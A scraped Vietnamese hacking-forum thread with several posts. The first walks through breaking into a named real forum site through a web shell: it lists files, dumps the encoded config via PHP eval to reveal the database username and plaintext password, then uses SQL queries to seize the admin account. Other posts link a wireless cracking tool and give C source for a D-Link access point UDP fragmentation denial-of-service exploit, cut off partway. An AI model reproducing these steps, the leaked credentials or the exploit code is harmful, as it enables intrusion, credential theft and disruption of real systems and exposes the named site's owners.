Cái này đặt user là tên web lun nên dễ tìm.Nếu ko bạn Trích: cat /var/cpanel/accounting.log roài search là ra user của nó . ok . Ở phần Work directory : cho vào : /srv/www/vhosts/thekyvn.com/httpdocs/diendan Nhấn excute . Bùm Trích: 5984319 drwxr-xr-x 6 thekyvietnam psacln 4096 Oct 9 04:44 cache 5984576 -r r r 1 thekyvietnam psacln 2256 Oct 3 14:07 conf_global.php 5984609 -rw-r r 1 thekyvietnam psacln 276 Sep 1 01:10 f_norm.gif 5984610 -rw-r r 1 thekyvietnam psacln 276 Sep 1 01:10 f_norm_dot.gif 5984611 -rw-r r 1 thekyvietnam psacln 206 Sep 1 01:10 f_norm_no.gif 5984612 -rw-r r 1 thekyvietnam psacln 206 Sep 1 01:10 f_norm_no_dot.gif 5984578 -rw-r r 1 thekyvietnam psacln 1406 Aug 10 04:53 favicon.ico 6196738 drwxrwxrwx 2 thekyvietnam psacln 4096 Oct 15 00:55 imageupload 5984579 -rw-r r 1 thekyvietnam psacln 21501 Sep 26 18:04 index.php 5984580 -rw-r r 1 thekyvietnam psacln 4326 Aug 26 06:04 init.php 5984585 -rw-r r 1 thekyvietnam psacln 2201 Aug 14 14:50 ipb_components.xml 5984581 -rw-r r 1 thekyvietnam psacln 451116 Aug 10 04:53 ipb_templates.xml 5984582 -rw-r r 1 thekyvietnam psacln 6431 Aug 26 06:04 ipchat.php 5984583 -rw-r r 1 thekyvietnam psacln 2839 Aug 10 04:53 ipd_components.xml 5997011 drwxr-xr-x 4 thekyvietnam psacln 4096 Aug 26 01:43 ips_kernel 5996968 drwxr-xr-x 3 thekyvietnam psacln 4096 Oct 11 03:41 jscripts 5999757 drwxr-xr-x 2 thekyvietnam psacln 4096 Aug 26 01:44 lofiversion 6127930 drwxr-xr-x 2 thekyvietnam psacln 4096 Aug 14 15:47 logo 6127947 drwxr-xr-x 5 thekyvietnam psacln 4096 Oct 20 04:45 media 5999763 drwxr-xr-x 2 thekyvietnam psacln 4096 Aug 26 01:44 modules 5984577 -rw-r r 1 thekyvietnam psacln 2238 Aug 17 20:48 mouse_tkvn.cur 5997110 drwxr-xr-x 2 thekyvietnam psacln 4096 Aug 26 01:44 retail 5999768 drwxr-xr-x 3 thekyvietnam psacln 4096 Aug 26 01:58 skin_acp 5984545 drwxr-xr-x 19 thekyvietnam psacln 4096 Aug 26 02:11 sources 5999910 drwxr-xr-x 4 thekyvietnam psacln 4096 Aug 10 04:46 style_avatars 5999956 drwxr-xr-x 3 thekyvietnam psacln 4096 Aug 10 04:46 style_emoticons 6000084 drwxr-xr-x 8 thekyvietnam psacln 4096 Sep 1 01:10 style_images 5984584 -rw-r r 1 thekyvietnam psacln 157 Aug 10 04:53 tile_back.gif 5997115 drwxrwxrwx 3 thekyvietnam psacln 40960 Oct 19 09:00 uploads Giờ mình đọc file conf_global.php nèo : Trích: cat conf_global.php Bùm : Trích: <?php @Zend; xì xà xì xồ hỉu chít liền Thôi bỏ mẹ, thằng nì noá zend mấy roài.Ứ đọc được.Decode thì mình ứ bít nhưng đọc ra cái biến thì chắc được :D. Lại phải phiền lão Eval PHP code . Trích: include("conf_global.php"); echo "user la : "; echo $INFO['sql_user']; echo "<br>"; echo "pass la : " ; echo $INFO['sql_pass']; Xong nó hiện ra : Trích: user la : thekyvn_forum pass la : weareone Hehe giờ dùng tới lão Run SQL query của con r60. Với câu query là : Trích: SHOW DATABASES; nó hiện ra database của nó là :csdl_thekyvn_vietnam táng nó vô ô base: roài forgot pass admin. Câu query dùng đến là : Trích: SELECT * FROM ibf_validating; Còn lại anh em làm gì thì làm :D xfile.frozen(HCE) Air Snort - Wireless hacking tool Here's link: http://airsnort.shmoo.com/ Chuoi(vniss) D-Link Wireless Access Point UDP Packets Remote Denial of Service Exploit /* * * Aaron Portnoy * * silc.thunkers.net, thunkers * * D-Link Wireless Access Point * Fragmented UDP DoS Proof of Concept * * * gcc -o dlink_dos dlink_dos.c -lnet -Wall * */ #include <libnet.h> #define DEVICE "eth0" #define SRC_IP "127.0.0.1" #define DST_IP "127.0.0.1" #define SRC_PRT 200 #define DST_PRT 11111 void usage (char *name) { fprintf (stderr, "Usage: %s -s <source ip> -d <destination ip>\ -a <source port> -b <destination port> \n", name); exit (EXIT_FAILURE); } int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT, u_short dPRT, int count) { libnet_t *l = NULL; libnet_ptag_t udp = 0; libnet_ptag_t ip = 0; char errbuf[LIBNET_ERRBUF_SIZE]; char *payload = NULL; u_short payload_s = 0, src_prt, dst_prt; u_long src_ip, dst_ip; int c, frag; if (!device) device = DEVICE; l = libnet_init (LIBNET_RAW4, device, errbuf); if (!l) { fprintf (stderr, "libnet_init() failed: %s\n", errbuf); exit (EXIT_FAILURE); } src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) : libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE); dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) : libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE); src_prt = sPRT ? sPRT : SRC_PRT; dst_prt = dPRT ? dPRT : DST_PRT; if (count == 1) { payload = "\0\0\0\0\0\0\0\0"; payload_s = 8; } udp = libnet_build_udp (src_prt, dst_prt, (LIBNET_UDP_H + payload_s) * 2, 0, (unsigned char *)payload, payload_s, l, udp); if (udp == -1) { fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror (l)); exit (EXIT_FAILURE); } switch (count) { case 1: frag = IP_MF; break; case 2: frag = 0x2002; break; case 3: frag = 0x0003; break; } ip = libnet_build_ipv4 (20, 0, 1800, frag, 128, IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l, ip); if (ip == -1) { fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror (l)); exit (EXIT_FAILURE); } c = libnet_write (l); if (c == -1) { fprintf (stderr, "Write error: %s\n", libnet_geterror (l)); exit (EXIT_FAILURE); } printf ("Wrote UDP packet; check the wire.\n"); libnet_destroy (l); return (EXIT_SUCCESS); } int main (int argc, char **argv) { int i; char *pDST, *pSRC, *device; u_short dPRT = 0; u_short sPRT = 0; pDST = pSRC = device = NULL; while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) { switch (i) { case 'D': device = optarg; break; case 'd': pDST = optarg; break; case 's':